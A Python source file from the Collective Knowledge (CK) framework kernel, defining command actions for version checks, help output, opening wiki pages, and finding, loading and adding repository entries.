# Actions, visible outside through module '*' such as [ck uid] or [ck uid *]
# **************************************************************************
############################################################
# Action: generate CK UID
#
# TARGET: end users
def uid(i):
"""
Input: {}
Output: {
Output from 'gen_uid' function
}
"""
o=i.get('out','')
r=gen_uid({})
if r['return']>0: return r
if o=='con':
out(r['data_uid'])
return r
############################################################
# Action: print CK version
#
# TARGET: end users
def version(i):
"""
Input: {}
Output: {
output from function 'get_version'
}
"""
o=i.get('out','')
r=get_version({})
if r['return']>0: return r
version_str=r['version_str']
if o=='con':
out('V'+version_str)
return r
############################################################
# Action: print python version used by CK
#
# TARGET: end users
def python_version(i):
"""
Input: {}
Output: {
version - sys.version
version_info - sys.version_info
}
"""
import sys
o=i.get('out','')
v1=sys.version
v2=sys.version_info
if o=='con':
out(v1)
return {'return':0, 'version':v1, 'version_info':v2}
############################################################
# Action: check CK status
#
# TARGET: CK kernel and low-level developers
def status(i):
"""
Input: {}
Output: {
outdated - if 'yes', newer version exists
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
outdated=''
o=i.get('out','')
try: import urllib.request as urllib2
except: import urllib2
try: from urllib.parse import urlencode
except: from urllib import urlencode
page=''
try:
res=urllib2.urlopen(cfg['status_url'])
page=res.read()
except urllib2.HTTPError as e:
return {'return':1, 'error':'Problem accessing server ('+format(e)+')'}
except urllib2.URLError as e:
return {'return':1, 'error':'Problem accessing server ('+format(e)+')'}
# Support for Python 3
if sys.version_info[0]>2:
try:
page=page.decode('utf-8')
except Exception as e:
pass
if page!='':
s1='version=\''
i1=page.find(s1)
if i1>0:
i2=page.find('\'',i1+9)
if i2>0:
lversion_str=page[i1+len(s1):i2].strip()
rx=check_version({'version':lversion_str})
if rx['return']>0: return rx
ok=rx['ok']
version_str=rx['current_version']
if ok!='yes':
outdated='yes'
if o=='con':
out('Your version is outdated: V'+version_str)
out('New available version : V'+lversion_str)
u=cfg.get('ck_web','')
if u!='':
out('')
out('If you install CK via pip, upgrade it as follows (prefix with "sudo" on Linux):')
out(' $ pip install ck --upgrade')
out('')
out('If you use GitHub version, update CK kernel (and all other repositories) as follows:')
out(' $ ck pull all --kernel')
out('')
out('Visit '+u+' for more details!')
if o=='con':
if outdated!='yes':
out('Your version is up-to-date: V'+version_str)
elif outdated=='':
out('Problem checking version ...')
return {'return':0, 'outdated':outdated}
############################################################
# Compare versions
#
# TARGET: CK kernel and low-level developers
def check_version(i):
"""
Input: {
version - your version (string)
}
Output: {
return - return code = 0
ok              - 'yes' if your CK kernel version is not older than the given version
current_version - your CK kernel version
}
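
       Example (illustrative sketch):

         import ck.kernel as ck

         r=ck.check_version({'version':'1.9.0'})
         # r['ok']=='yes' if the running kernel is not older than 1.9.0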
"""
ok='yes'
r=get_version({})
if r['return']>0: return r
version=r['version']
version_str=r['version_str']
lversion_str=i['version'].replace('dev','.1') # for compatibility with older versions
lversion=lversion_str.split('.')
# Comparing
for q in range(0, len(version)):
if len(lversion)<=q:
break
v=version[q]
lv=lversion[q]
# try int first, then try string
try:
lv=int(lv)
v=int(v)
except Exception as e:
pass
if lv>v:
ok='no'
break
if lv<v:
break
return {'return':0, 'ok':ok, 'current_version':version_str}
############################################################
# Convert info about entry to CID
#
# TARGET: CK kernel and low-level developers
def convert_entry_to_cid(i):
"""
Input: {
(repo_uoa) - Repo UOA
(repo_uid) - Repo UID
(module_uoa) - Module UOA
(module_uid) - Module UID
(data_uoa) - Data UOA
(data_uid) - Data UID
}
Output: {
return - return code = 0
cuoa - module_uoa:data_uoa (substituted with ? if can't find)
cid - module_uid:data_uid (substituted with ? if can't find)
xcuoa - repo_uoa:module_uoa:data_uoa (substituted with ? if can't find)
xcid - repo_uid:module_uid:data_uid (substituted with ? if can't find)
}
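
       Example (illustrative; missing parts are substituted with '?'):

         import ck.kernel as ck

         r=ck.convert_entry_to_cid({'module_uoa':'module', 'data_uoa':'repo'})
         # r['cuoa'] -> 'module:repo', r['xcuoa'] -> '?:module:repo'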
"""
xcuoa=''
xcid=''
if i.get('module_uoa','')!='': cuoa=i['module_uoa']
else: cuoa='?'
if i.get('module_uid','')!='': cid=i['module_uid']
else: cid='?'
cuoa+=':'
cid+=':'
if i.get('data_uoa','')!='': cuoa+=i['data_uoa']
else: cuoa+='?'
if i.get('data_uid','')!='': cid+=i['data_uid']
else: cid+='?'
if i.get('repo_uoa','')!='': xcuoa=i['repo_uoa']+':'+cuoa
else: xcuoa='?:'+cuoa
if i.get('repo_uid','')!='': xcid=i['repo_uid']+':'+cid
else: xcid='?:'+cid
r={'return':0}
r['cuoa']=cuoa
r['cid']=cid
r['xcuoa']=xcuoa
r['xcid']=xcid
return r
# **************************************************************************
# Common actions (if not found in other modules, call these functions here)
# **************************************************************************
############################################################
# Special function: open webbrowser with help
#
# TARGET: CK kernel and low-level developers
def webhelp(i):
"""
Input: { from access function }
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['wiki_data_web']
if m!='':
if duoa=='':
duoa=m
m=cfg['module_name']
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
p=r['path']
muoa=r.get('module_uoa','')
duoa=r.get('data_uoa','')
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# Prepare URL
url+=muoa+':'+duoa #cid.replace(':','/')
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with discussion wiki page for collaborative R&D
# URL is taken from default kernel configuration cfg['wiki_data_web']
#
# TARGET: CK kernel and low-level developers
def wiki(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['wiki_data_web']
if muoa=='' or duoa=='':
# Try to detect CID in current path
rx=detect_cid_in_current_path({})
if rx['return']==0:
muoa=rx.get('module_uoa','')
duoa=rx.get('data_uoa','')
if muoa=='' or duoa=='':
return guide({}) #{'return':1, 'error':'entry is not defined'}
r=find_path_to_data({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# Prepare URL
url+=cid.replace(':','_')
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with private discussion wiki page for collaborative R&D
# URL is taken from default kernel configuration cfg['private_wiki_data_web']
#
# TARGET: CK kernel and low-level developers
def pwiki(i):
"""
Input: {
(repo_uoa)
(module_uoa)
(data_uoa)
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['private_wiki_data_web']
if muoa=='' or duoa=='':
# Try to detect CID in current path
rx=detect_cid_in_current_path({})
if rx['return']==0:
muoa=rx.get('module_uoa','')
duoa=rx.get('data_uoa','')
if muoa=='' or duoa=='':
return {'return':1, 'error':'entry is not defined'}
r=find_path_to_data({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# Prepare URL
url+=cid.replace(':','_')
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with API, if exists
#
# TARGET: CK kernel and low-level developers
def webapi(i):
"""
Input: { from access function }
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
url=cfg['api_web']
if muoa=='':
muoa=duoa
if muoa=='':
url+='ck_'+cfg['subdir_kernel']+'_api/html/kernel_8py.html'
else:
duoa=muoa
muoa=cfg['module_name']
r=load({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
muoa=r['data_uoa']
url+=muoa+'/#api'
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
############################################################
# Special function: open webbrowser with API, if exists
#
# TARGET: CK kernel and low-level developers
def browser(i):
"""
Input: {
(template) - use this web template
(repo_uoa) -
(module_uoa) -
(data_uoa) - view a given entry
(extra_url) - extra URL
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
# Check if ck-web is installed
r=find({'module_uoa':'module',
'data_uoa':'wfe'})
if r['return']>0:
if r['return']!=16: return r
out('Seems like ck-web repository is not installed (can\'t find wfe module)!')
out('Please, install it via "ck pull repo:ck-web" and try again!')
return {'return':0}
t=i.get('template','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
cid=''
if duoa!='' or muoa!='' or ruoa!='':
if ruoa!='': cid=ruoa+':'
if muoa!='': cid+=muoa+':'
if duoa!='': cid+=duoa
# Starting web service and asking to open page
return access({'action':'start', 'module_uoa':'web', 'browser':'yes',
'template':t, 'cid':cid, 'extra_url':i.get('extra_url','')})
############################################################
# Special function: open webbrowser with user/developer guide wiki
#
# TARGET: CK kernel and low-level developers
def guide(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
url=cfg['ck_web_wiki']
out('Opening web page '+url+' ...')
import webbrowser
webbrowser.open(url)
return {'return':0}
#########################################################
# Common action: print help for a given module
#
# TARGET: CK kernel and low-level developers
def help(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
help - help text
}
"""
o=i.get('out','')
m=i.get('module_uoa','')
if m=='':
m='<module_uoa>'
h= 'Usage: '+cfg['cmd'].replace('$#module_uoa#$', m)+'\n'
if m=='<module_uoa>':
h+='\n'
h+=' Common actions for all CK modules (unless overloaded):\n'
for q in sorted(cfg['common_actions']):
s=q
desc=cfg['actions'][q].get('desc','')
if desc!='': s+=' - '+desc
h+=' * '+s+'\n'
h+='\n'
h+=' CK kernel actions:\n'
for q in sorted(cfg['actions']):
if q not in cfg['common_actions']:
s=q
desc=cfg['actions'][q].get('desc','')
if desc!='': s+=' - '+desc
h+=' * '+s+'\n'
else:
h+='\n'
h+=' Available actions:\n\n'
# Attempt to load
r=list_actions({'module_uoa':m})
if r['return']>0: return r
actions=r['actions']
if len(actions)==0:
h+=' Not described yet ...\n'
else:
for q in sorted(actions.keys()):
s=q
desc=actions[q].get('desc','')
if desc!='': s+=' - '+desc
h+=' * '+s+'\n'
h+='\n'
h+=' Common actions for this module from the CK kernel:\n'
h+=' $ ck help\n'
if m=='<module_uoa>':
h+='\n'
h+=cfg['help_examples']
h+='\n'
h+=cfg['help_web']
if o=='con': out(h)
return {'return':0, 'help':h}
#########################################################
# Common action: print help for a given module
#
# TARGET: CK kernel and low-level developers
def short_help(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
help - help text
}
"""
import sys
o=i.get('out','')
r=version({})
if r['return']>0: return r
h='CK version: '+r['version_str']+'\n'
r=python_version({})
if r['return']>0: return r
x=sys.executable
if x!=None and x!='':
h+='\nPython executable used by CK: '+x+'\n'
h+='\nPython version used by CK: '+r['version'].replace('\n','\n ')+'\n'
h+='\nPath to the default repo: '+work['dir_default_repo']+'\n'
h+= 'Path to the local repo: '+work['dir_local_repo']+'\n'
h+= 'Path to CK repositories: '+work['dir_repos']+'\n'
h+='\n'+cfg['help_web'].replace('\n','').strip()+'\n' #.replace(' ','')+'\n'
h+='CK Google group: https://bit.ly/ck-google-group\n'
h+='CK Slack channel: https://cKnowledge.org/join-slack\n'
h+='Stable CK components: https://cKnowledge.io'
if o=='con':
out(h)
return {'return':0, 'help':h}
#########################################################
# Common action: print input
#
# TARGET: CK kernel and low-level developers
def print_input(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
html - input as JSON
}
"""
o=i.get('out','')
rx=dumps_json({'dict':i, 'sort_keys':'yes'})
if rx['return']>0: return rx
h=rx['string']
if o=='con': out(h)
return {'return':0, 'html':h}
#########################################################
# Common action: print info about a given CK entry
#
# TARGET: CK kernel and low-level developers
def info(i):
"""
Input: {
(repo_uoa)
module_uoa
(data_uoa)
}
Output: {
Output of 'load' function
}
"""
o=i.get('out','')
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if muoa=='':
return {'return':1, 'error':'module UOA is not defined'}
module_info=False
if duoa=='':
module_info=True
duoa=muoa
muoa=cfg['module_name']
ii={'module_uoa':muoa, 'data_uoa':duoa}
if ruoa!='': ii['repo_uoa']=ruoa
r=load(ii)
if r['return']>0: return r
if o=='con':
if module_info:
p=r['path']
dd=r['dict']
developer=dd.get('developer','')
license=dd.get('license','')
desc=dd.get('desc','')
# Get user-friendly CID
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
out('*** CID ***')
out(cuoa+' ('+cid+')')
out('')
out('*** Path ***')
out(p)
if desc!='':
out('')
out('*** Description ***')
out(desc)
if developer!='':
out('')
out('*** Developer ***')
out(developer)
if license!='':
out('')
out('*** License ***')
out(license)
else:
p=r['path']
duid=r['data_uid']
dalias=r['data_alias']
muid=r['module_uid']
malias=r['module_alias']
out('Path = '+p)
out('')
out('Data alias = '+dalias)
out('Data UID = '+duid)
out('')
out('Module alias = '+malias)
out('Module UID = '+muid)
return r
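# Example (illustrative comment-only sketch; 'program:demo' is a hypothetical
# module:data pair): printing info about an entry via the 'access' API.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'info', 'module_uoa':'program',
#                  'data_uoa':'demo', 'out':'con'})
#   if r['return']>0: print(r['error'])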
############################################################
# Common action: get CID from current path
#
# TARGET: CK kernel and low-level developers
def path(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
                Output from the 'detect_cid_in_current_path' function
}
"""
o=i.get('out','')
r=detect_cid_in_current_path(i)
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cuoa=rx['cuoa']
cid=rx['cid']
xcuoa=rx['xcuoa']
xcid=rx['xcid']
# If console, print CIDs
if o=='con':
out(cuoa)
out(cid)
out(xcuoa)
out(xcid)
return r
############################################################
# Common action: get CID from current path or given CID (module_uid:data_uid)
#
# TARGET: end users
def cid(i):
"""
Input: {
(repo_uoa) - repo UOA
(module_uoa) - module UOA
(data_uoa) - data UOA
                             If the above is empty, detect the CID in the current path!
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
                Output from the 'detect_cid_in_current_path' function
data_uoa - data UOA
module_uoa - module UOA
(repo_uoa) - repo UOA
}
"""
o=i.get('out','')
# Check which CID to detect
ruoa=i.get('repo_uoa','')
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if ruoa=='' and muoa=='' and duoa=='':
r=detect_cid_in_current_path(i)
else:
r=find({'repo_uoa':ruoa, 'module_uoa':muoa, 'data_uoa':duoa})
if r['return']>0: return r
rx=convert_entry_to_cid(r)
if rx['return']>0: return rx
cid=rx['cid']
# If console, print CIDs
if o=='con':
out(cid)
# Try to copy to Clipboard if supported by OS
rx=copy_to_clipboard({'string':cid})
# Ignore error
return r
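# Example (illustrative comment-only sketch): detecting the CID of the entry
# in the current directory - the API analog of running "ck cid" inside an entry.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'cid'})
#   if r['return']==0: print(r['module_uoa']+':'+r['data_uoa'])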
############################################################
# Copy current path to clipboard (productivity function)
#
# TARGET: CK kernel and low-level developers
def copy_path_to_clipboard(i):
"""
Input: {
(add_quotes) - if 'yes', add quotes
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import os
p=os.getcwd()
if i.get('add_quotes','')=='yes':
p='"'+p+'"'
rx=copy_to_clipboard({'string':p})
# Ignore error
return {'return':0}
#########################################################
# Common action: load data (module) meta description
#
# TARGET: CK kernel and low-level developers
def load(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(get_lock) - if 'yes', lock this entry
              (lock_retries)          - number of retries to acquire lock (default=5)
              (lock_retry_delay)      - delay in seconds before trying to acquire lock again (default=10)
(lock_expire_time) - number of seconds before lock expires (default=30)
(skip_updates) - if 'yes', do not load updates
(skip_desc) - if 'yes', do not load descriptions
(load_extra_json_files) - list of files to load from the entry
(unlock_uid) - UID of the lock to release it
(min) - show minimum when output to console (i.e. meta and desc)
(create_if_not_found) - if 'yes', create, if entry is not found - useful to create and lock entries
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
dict - entry meta description
(info) - entry info
(updates) - entry updates
(desc) - entry description
path - path to data entry
path_module - path to module entry with this entry
path_repo - path to the repository of this entry
repo_uoa - repo UOA
repo_uid - repo UID
repo_alias - repo alias
module_uoa - module UOA
module_uid - module UID
module_alias - module alias
data_uoa - data UOA
data_uid - data UID
data_alias - data alias
data_name - user friendly name
(extra_json_files) - dict with extra json files (key is the filename from 'load_extra_json_files')
(lock_uid) - unlock UID, if locked successfully
}
"""
o=i.get('out','')
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
d=i.get('data_uoa','')
if d=='':
return {'return':1, 'error':'data UOA is not defined'}
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':d})
if r['return']>0:
if r['return']==16 and i.get('create_if_not_found','')=='yes':
r=add({'repo_uoa':a, 'module_uoa':m, 'data_uoa':d})
if r['return']>0:
return r
r=find_path_to_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':d})
if r['return']>0: return r
else:
return r
p=r['path']
slu=i.get('skip_updates','')
sld=i.get('skip_desc','')
# Set/check lock
i['path']=p
rx=set_lock(i)
if rx['return']>0: return rx
luid=rx.get('lock_uid','')
# Load meta description
r1=load_meta_from_path({'path':p, 'skip_updates':slu, 'skip_desc':sld})
if r1['return']>0: return r1
r.update(r1)
r['path']=p
r['data_name']=r1.get('info',{}).get('data_name','')
if luid!='': r['lock_uid']=luid
# If load extra files
lejf=i.get('load_extra_json_files',[])
if len(lejf)>0:
ejf={}
for ff in lejf:
rx=load_json_file({'json_file':os.path.join(p,ff)})
if rx['return']>0: return rx
ejf[ff]=rx['dict']
r['extra_json_files']=ejf
# If console mode, print json
if o=='con':
dd=r
if i.get('min','')=='yes':
dd={
'desc':r.get('desc',{}),
'dict':r.get('dict',{})
}
rr=dumps_json({'dict':dd, 'sort_keys':'yes'})
if rr['return']==0:
out(rr['string'])
return r
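# Example (illustrative comment-only sketch; 'program:demo' is hypothetical):
# loading an entry's meta-description and path via the 'access' API.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'load', 'module_uoa':'program', 'data_uoa':'demo'})
#   if r['return']>0: print(r['error'])
#   else:
#       meta = r['dict']   # meta description of the entry
#       path = r['path']   # path to the entry on disk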
#########################################################
# Common action: find data (module) - uses 'load' function
#
# TARGET: CK kernel and low-level developers
def find(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
}
Output: {
Output of the 'load' function
number_of_entries - total number of found entries
}
"""
o=i.get('out','')
rr=find2(i)
if rr['return']>0:
if rr['return']==16 and cfg.get('download_missing_components','')=='yes':
import copy
muoa=i.get('module_uoa','')
duoa=i.get('data_uoa','')
# out('')
# out(' WARNING: checking missing components "'+muoa+':'+duoa+'" at the CK portal ...')
ii=copy.deepcopy(i)
ii['repo_uoa']=cfg['default_exchange_repo_uoa']
ii['out']='con'
# Try to download
ry=download(ii)
if ry['return']>0: return ry
# Restart local find
rr=find2(i)
return rr
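# Example (illustrative comment-only sketch; names are hypothetical): finding
# the path to an entry; note that 'find' above may first try to download a
# missing component when 'download_missing_components' is enabled.
#
#   import ck.kernel as ck
#   r = ck.access({'action':'find', 'module_uoa':'program', 'data_uoa':'demo'})
#   if r['return']==0: print(r['path'])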
#########################################################
# original find
def find2(i):
o=i.get('out','')
i['out']=''
# Check wildcards
lst=[]
a=i.get('repo_uoa','')
m=i.get('module_uoa','')
duoa=i.get('data_uoa','')
if m=='':
return {'return':1, 'error':'module UOA is not defined'}
if duoa=='':
return {'return':1, 'error':'data UOA is not defined'}
if a.find('*')>=0 or a.find('?')>=0 or m.find('*')>=0 or m.find('?')>=0 or duoa.find('*')>=0 or duoa.find('?')>=0:
r=list_data({'repo_uoa':a, 'module_uoa':m, 'data_uoa':duoa})
if r['return']>0: return r
lst=r['lst']
r={'return':0}
if len(lst)>0:
r.update(lst[0])
else:
return {'return':1, 'error':'entry was not found'}
else:
# Find path to data
r=find_path_to_data(i)
if r['return']>0: return r
p=r['path']
ruoa=r.get('repo_uoa','')
ruid=r.get('repo_uid','')
muoa=r.get('module_uoa','')
muid=r.get('module_uid','')
duid=r.get('data_uid','')
duoa=r.get('data_alias','')
if duoa=='': duoa=duid
lst.append({'path':p, 'repo_uoa':ruoa, 'repo_uid':ruid,
'module_uoa':muoa, 'module_uid':muid,
'data_uoa':duoa, 'data_uid': duid})
if o=='con':
pf=''
for q in lst:
p=q['path']
out(p)
if pf=='': pf=p
i['out']=o
r['number_of_entries']=len(lst)
return r
#########################################################
# Common action: print 'cd {path to CID}'
#
# TARGET: CK kernel and low-level developers
def cd(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
or
cid
}
Output: {
Output of the 'load' function
string - prepared string 'cd {path to entry}'
}
"""
o=i.get('out','')
i['out']=''
r=find(i)
i['out']=o
if r['return']>0: return r
noe=r.get('number_of_entries','')
if noe=='': noe=0
if noe>1 and o=='con':
out('CK warning: '+str(noe)+' entries found! Selecting the first one ...')
out('')
p=r.get('path','')
if p!='':
rx=get_os_ck({})
if rx['return']>0: return rx
plat=rx['platform']
s='cd '
if plat=='win':
s+='/D '
if p.find(' ')>0:
p='"'+p+'"'
s+=p
out(s)
r['string']=s
import platform
import subprocess
out('')
out('Warning: you are in a new shell with a reused environment. Enter "exit" to return to the original one!')
if platform.system().lower().startswith('win'): # pragma: no cover
p = subprocess.Popen(["cmd", "/k", s], shell = True, env=os.environ)
p.wait()
else:
rx=gen_tmp_file({})
if rx['return']>0: return rx
fn=rx['file_name']
rx=save_text_file({'text_file':fn, 'string':s})
if rx['return']>0: return rx
os.system("bash --rcfile "+fn)
return r
#########################################################
# Common action: print 'cd {path to CID}' and copy it to the clipboard
#
# TARGET: CK kernel and low-level developers
def cdc(i): # pragma: no cover
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
or
cid
}
Output: {
Output of the 'load' function
}
"""
r=cd(i)
if r['return']>0: return r
s=r.get('string','')
if s!='':
rx=copy_to_clipboard({'string':s})
if rx['return']>0: return rx
return r
##############################################################################
# Common action: add data (module) meta-description to a repository
#
# TARGET: CK kernel and low-level developers
def add(i):
"""
Input: {
(repo_uoa) - repo UOA
module_uoa - module UOA
data_uoa - data UOA
(data_uid) - data UID (if uoa is an alias)
(data_name) - user friendly data name
(dict_from_cid) -
(dict_from_repo_uoa) -
(dict_from_module_uoa) -
(dict_from_data_uoa) - if present, pre-load dict
from this (module_uoa):data_uoa (analog of copy)
(update) - if == 'yes' and entry exists, update it
(dict) - meta description to record
(substitute) - if 'yes' and update=='yes' substitute dictionaries, otherwise merge!
(desc) - description of an entry (gradually adding API description in flat format)
(extra_json_files) - dict with extra json files to save to entry (key is a filename)
(tags) - list or comma separated list of tags to add to entry
(info) - entry info to record - normally, should not use it!
(extra_info) - enforce extra info such as
author
author_email
author_webpage
license
copyright
If not specified then taken from kernel (prefix 'default_')
(updates) - entry updates info to record - normally, should not use it!
(ignore_update) - if 'yes', do not add info about update
(ask) - if 'yes', ask questions, otherwise silent
              (unlock_uid)            - unlock UID if it was previously locked
(sort_keys) - by default, 'yes'
(share) - if 'yes', try to add via GIT
(skip_indexing) - if 'yes', skip indexing even if it is globally on
(allow_multiple_aliases) - if 'yes', allow multiple aliases for the same UID
(needed for cKnowledge.io to publish
renamed components with the same UID)
}
Output: {
return - return code = 0, if successful
16, if entry already exists
> 0, if error
(error) - error text if return > 0
Output from the 'create_entry' function
}
"""
o=i.get('out','')
t='added'
ra=i.get('repo_uoa','')
m=i.get('module_uoa','')
d=i.get('data_uoa','')
di=i.get('data_uid','')
dn=i.get('data_name','')
ama=(i.get('allow_multiple_aliases','')=='yes') # Experimental functionality for cKnowledge.io
if cfg.get('allowed_entry_names','')!='':
import re
anames=cfg.get('allowed_entry_names','')
if not re.match(anames, ra) or \
not re.match(anames, m) or \
not re.match(anames, d) or \
not re.match(anames, di):
return {'return':1, 'error':'found disallowed characters in names (allowed: "'+anames+'")'}
if cfg.get('force_lower','')=='yes':
ra=ra.lower()
m=m.lower()
d=d.lower()
di=di.lower()
uuid=i.get('unlock_uid','')
up=i.get('update','')
ask=i.get('ask','')
# Get repo path
r=find_path_to_repo({'repo_uoa':ra})
if r['return']>0: return r
pr=r['path']
ruoa=r['repo_uoa']
ruid=r['repo_uid']
ralias=r['repo_alias']
rd=r['dict']
rshared=rd.get('shared','')
rsync=rd.get('sync','')
if i.get('share','')=='yes': rsync='yes'
# Check if writing is allowed
ii={'module_uoa':m, 'repo_uoa':r['repo_uoa'], 'repo_uid':r['repo_uid'], 'repo_dict':rd}
r=check_writing(ii)
if r['return']>0: return r
# Load info about module
r=load({'module_uoa':cfg['module_name'],
'data_uoa':m})
if r['return']>0: return r
elif r['return']==16:
return {'return':8, 'error':'can\'t find path to module "'+m+'"'}
muoa=r['data_uoa']
muid=r['data_uid']
malias=r['data_alias']
pm=r['path']
uid=r['data_uid']
alias=r['data_alias']
if alias=='': alias=uid
module_desc=r['dict']
# Check if there is a split of directories for this module in local config
# to handle numerous entries (similar to MediaWiki)
split_dirs=get_split_dir_number(rd, muid, muoa)
# Ask additional questions
if o=='con' and ask=='yes':
# Asking for alias
if d=='' or is_uid(d):
r=inp({'text':'Enter an alias (or Enter to skip it): '})
d=r['string']
# Asking for user-friendly name
if dn=='' and up!='yes':
r=inp({'text':'Enter a user-friendly name of this entry (or Enter to reuse alias): '})
dn=r['string']
# Load dictionary from other entry if needed
dfcid=i.get('dict_from_cid','')
dfruoa=i.get('dict_from_repo_uoa','')
dfmuoa=i.get('dict_from_module_uoa','')
dfduoa=i.get('dict_from_data_uoa','')
if dfcid!='':
r=parse_cid({'cid':dfcid})
if r['return']>0: return r
dfruoa=r.get('repo_uoa','')
dfmuoa=r.get('module_uoa','')
dfduoa=r.get('data_uoa','')
if d!='' and not is_uoa(d):
return {'return':1, 'error':'alias has disallowed characters'}
if dfduoa!='':
if dfmuoa=='': dfmuoa=m
ii={'module_uoa':dfmuoa, 'data_uoa':dfduoa}
if dfruoa!='': ii['repo_uoa']=dfruoa
r=load(ii)
if r['return']>0: return r
df=r.get('dict',{})
# Create first level entry (module)
r=create_entry({'path':pr, 'data_uoa':alias, 'data_uid':uid})
if r['return']>0 and r['return']!=16: return r
p1=r['path']
# Create second level entry (data)
i1={'path':p1}
if split_dirs!=0:
i1['split_dirs']=split_dirs
pdd=''
if di!='':
i1['data_uid']=di
if d!='':
i1['data_uoa']=d
if ama:
i1['allow_multiple_aliases']='yes'
rr=create_entry(i1)
if rr['return']>0 and rr['return']!=16: return rr
duid=rr['data_uid']
pdd=rr['data_uoa']
dalias=rr['data_alias']
# Preparing meta-description
a={}
info={}
updates={}
desc={}
p2=rr['path']
p3=os.path.join(p2, cfg['subdir_ck_ext'])
p4=os.path.join(p3, cfg['file_meta'])
p4i=os.path.join(p3, cfg['file_info'])
p4u=os.path.join(p3, cfg['file_updates'])
p4d=os.path.join(p3, cfg['file_desc'])
    # If the data entry already exists
if rr['return']==16:
if up=='yes':
t='updated'
# Check if locked
rl=check_lock({'path':p2, 'unlock_uid':uuid})
if rl['return']>0:
if rl['return']==32:
rl['data_uoa']=pdd
rl['data_uid']=duid
return rl
# Entry exists, load configuration if update
r2=load_meta_from_path({'path':p2})
if r2['return']>0: return r2
a=r2['dict']
info=r2.get('info',{})
updates=r2.get('updates',{})
desc=r2.get('desc',{})
if dn=='': dn=info.get('data_name','')
else:
return {'return':16,'error':'entry already exists in path ('+p2+')'}
else:
# Create configuration directory
if not os.path.isdir(p3):
try:
os.mkdir(p3)
except Exception as e:
return {'return':1, 'error':format(e)}
if dn=='' and not is_uid(d):
dn=d
if dfduoa!='':
r=merge_dicts({'dict1':a, 'dict2':df})
if r['return']>0: return r
# If dict, info and updates are in input, try to merge ...
cma=i.get('dict',{})
cmad=i.get('desc',{})
if i.get('substitute','')=='yes':
a=cma
desc=cmad
else:
r=merge_dicts({'dict1':a, 'dict2':cma})
if r['return']>0: return r
r=merge_dicts({'dict1':desc, 'dict2':cmad})
if r['return']>0: return r
# Check tags
xtags=a.get('tags',[])
tags=i.get('tags','')
if tags=='': tags=[]
elif type(tags)!=list:
tags=tags.split(',')
for l in range(0,len(tags)):
ll=tags[l].strip()
if ll not in xtags:
xtags.append(ll)
if len(xtags)>0:
a['tags']=xtags
# Process info
cminfo=i.get('info',{})
if len(cminfo)!=0:
info=cminfo
# r=merge_dicts({'dict1':info, 'dict2':cminfo})
# if r['return']>0: return r
